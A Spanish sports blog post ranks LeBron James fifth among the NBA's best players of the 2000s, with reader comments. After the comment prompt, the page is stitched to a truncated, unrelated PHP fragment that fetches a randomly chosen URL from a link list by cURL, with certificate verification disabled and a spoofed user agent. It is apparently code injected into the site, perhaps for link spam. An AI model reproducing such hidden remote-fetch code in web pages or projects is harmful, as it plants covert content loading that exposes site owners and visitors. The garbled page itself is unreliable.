Los 10 mejores de la década: Nº05

30 de September de 2010 por Viva_Dirk
Artículo 6 de 10 de la serie Los mejores de la década

5.- Lebron James

Llamado a la gloria antes incluso de debutar en la liga, desde que llegara a la liga en 2003 Lebron ha confirmado todo lo que se esperaba de él. Después de estos 7 años y debido a su personalidad hay quien se alegra de cada una de sus derrotas (podríamos hablar del ‘rey sin corona’) pero si tenemos en cuenta que en las 7 campañas anteriores a la llegada de James los Cavs llevaban una media de 31 victorias y que tras estos 7 años liderados por él esa media llega a las 50, podemos comprobar el impacto de ‘El Elegido’ en la franquicia.

Logró el premio al rookie del año gracias a unos bestiales 21-5-6, cifras que ningún rookie conseguía desde que lo hiciera un tal Michael Jordan casi 20 años antes. Cleveland pasaba de 17 a 35 victorias y James se confirmaba como un líder sobre el que construir un equipo. En su segundo años sus números pasaron de muy buenos a bestiales consiguiendo 27 puntos, 7 rebotes, 7 asistencias y 2 robos por partido con tan solo 20 años. Estas estadísticas situaban al chico a otro nível pero no alcanzaban para llevar a los Cavs a la post-temporada.

Fue en la temporada 05-06 cuando por fin alcanzó los play-offs siendo incluído además en el mejor quinteto de la liga gracias a sus 31.4 puntos, 7 rebotes y 6.6 asistencias por noche. Una vez en play-offs los Cavs hicieron sudar sangre a unos Pistons que habían ganado 64 partidos y que solo consiguieron el pase ante su publico en un agónico 7º partido.

Y ya en su cuarta campaña alcanzaba la ansiada final de la NBA, algo que muchos jugadores jamás han conseguido. Con una plantilla muy limitada los Cavs se plantaron frente a los Spurs gracias a un juego más colectivo de James que alcanzó un promedio de 8 asistencias en aquellos play-offs. Desgraciadamente para ellos, no fueron rival para Duncan y sus compañeros que los barrieron de la pista y les aplicaron un severo correctivo.

Tras ese relativo éxito el equipo no se reforzó en demasía de cara a la siguiente campaña y Lebron seguía teniendo en Ilgauskas a su mejor compañero. A pesar de esto los Cavs volvieron a alcanzar la segunda ronda de play-offs gracias a su líder que mantenía unas estadísticas increíbles. En la 08-09, con la llegada de Mo Williams, Lebron y el equipo vieron como subía su nivel de exigencia y ellos respondieron con nada menos que 66 victorias, la mejor marca de la franquicia con mucha diferencia. Esto otorgó a James su primer MVP, un paso más en su meteórica carrera. Sin embargo es cuando sube la exigencia que suelen aparecen las primeras decepciones, y así fue cuando tras barrer a sus rivales por 8-0 en las dos primeras rondas de Playoffs, los Cavs cayeron antes los Orlando Magic en la final de conferencia con relativa facilidad. De nada sirvió la espectacular canasta de Lebron (una de las mejores de lo que llevamos de siglo) para empatar a 1 la serie.

Aún mas reforzado llegó el equipo a los play-offs de esta última temporada, con Lebron con  su segundo MVP en el bolsillo y Jamison & Shaq como principales refuerzos. Tras vencer a los Bulls en primera ronda, los Cavs se estrellaron antes unos Celtics que les dieron un auténtico baño táctico con alguna derrota por más de 30 puntos de diferencia. Una humillación para la que ni Lebron, ni los aficionados de Cleveland estaban preparados. El resto de la historia, la que abre una nueva década, ya la conocemos todos.

Los números de Lebron durante estos años en la NBA no dejan lugar a ninguna duda: 27.8 puntos, 7 rebotes, 7 asistencias y 1.7 robos por partido, Rookie del año el 2004, 2 veces MVP, 4 veces en el mejor quinteto, 2 MVPs del All-Star,  6 veces All-Star, un 95% de los partidos posibles disputados y poseedor de varios récords de precocidad. De todas maneras se trata aún de un jugador con un gran futuro y que no conoce la gloria del anillo. Personalmente nunca vi a Cleveland entre los 2 máximos favoritos al título y aún así llegaron a una final, todo gracias a un solo hombre, del cual jamás olvidaré su actuación en el 5º partido de la final de conferencia de 2007 frente a los Pistons. Ya ha hecho grandes cosas. Veremos si lo mejor esta por llegar.

Comenta

6 comentarios a esta entrada

  1. sayim dice:
    #1

    No tengo en Lebron a uno de mis preferidos y considero que sus números están por encima de su impacto real en el juego, pero creo que si debe estar entre los 10 mejores de la década.

    Por cierto, Fantástica idea esta serie de reportajes. Muy interesantes y fantasticamente escritos. Enhorabuena Viva_Dirk

      Citar

  2. pcerezo dice:
    #2

    Ansioso por ver los que quedan: Garnett, Gasol, Koben, Duncan y Shaq…

    Gracias por los artículos, amenizan hasta el comienzo de la temporada…

      Citar

  3. telekoman dice:
    #3

    El problema de Lebron es que se aleja bastante de lo que la mayoría de nosotros considera un artista del baloncesto. Parece que basa casi todo su juego en penetraciones brutales y mates plenos de fuerza y eso está bien, pero cansa. Es más estético otro tipo de juego, más sutil, delicado incluso como el de Kobe. Eso termina pasándole factura de cara al público. Y lo más curioso es que realmente no es así. El tío reparte juego de una forma que a muchos bases les encantaría. Tiene un tiro exterior bastante decente y una capacidad para atrapar rebotes realmente notable sin necesidad de estar debajo de la canasta. Vamos, que es un grande, pero el tío cae como el culo.

      Citar

  4. CAMPO2 dice:
    #4

    Yo creo que los cuatro puestos que quedan seran para garnett, duncan, bryant y shaq

    A mi tambien me cae cLebron como el culo con sus poses y las copiadas de los ritos antes de los partidos

      Citar

  5. Txusma dice:
    #5

    Cae como el culo pero no me imagino a muchos jugadores que tuvieron el impacto que tuvo Lebron sobre los Cavs cuando llegó. Jugar la final de la temporada 2006-2007 con el equipo que tenían en los Cavs fue un mérito enorme a la altura del de Iverson en la 2000-2001

      Citar

  6. Lebron dice:
    #6

    Muy interesante el reportaje. Creo con sinceridad que algo que hacia falta en la NBA, desde la partida de Michael Jordan, no había visto un jugador que demostrara la pasión por este deporte. No digo que los demás no lo demuestre. Pero si indagamos un poco los orígenes e historias de jugadores como Lebron, entenderemos que es un jugador excepcional, que logro el resurgimiento de una franquicia, al grado que se pueda mantener tras su salida. Su extravagancias y trabajo de showman, es parte de su personalidad. Y aun así es un deportista que ha demostrado en la cancha ser un gran motor que comparte y ayuda a la victoria de equipo.
    Esperemos que este año pueda cumplir su objetivo de ganar un anillo, que bien merecido se lo tiene.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>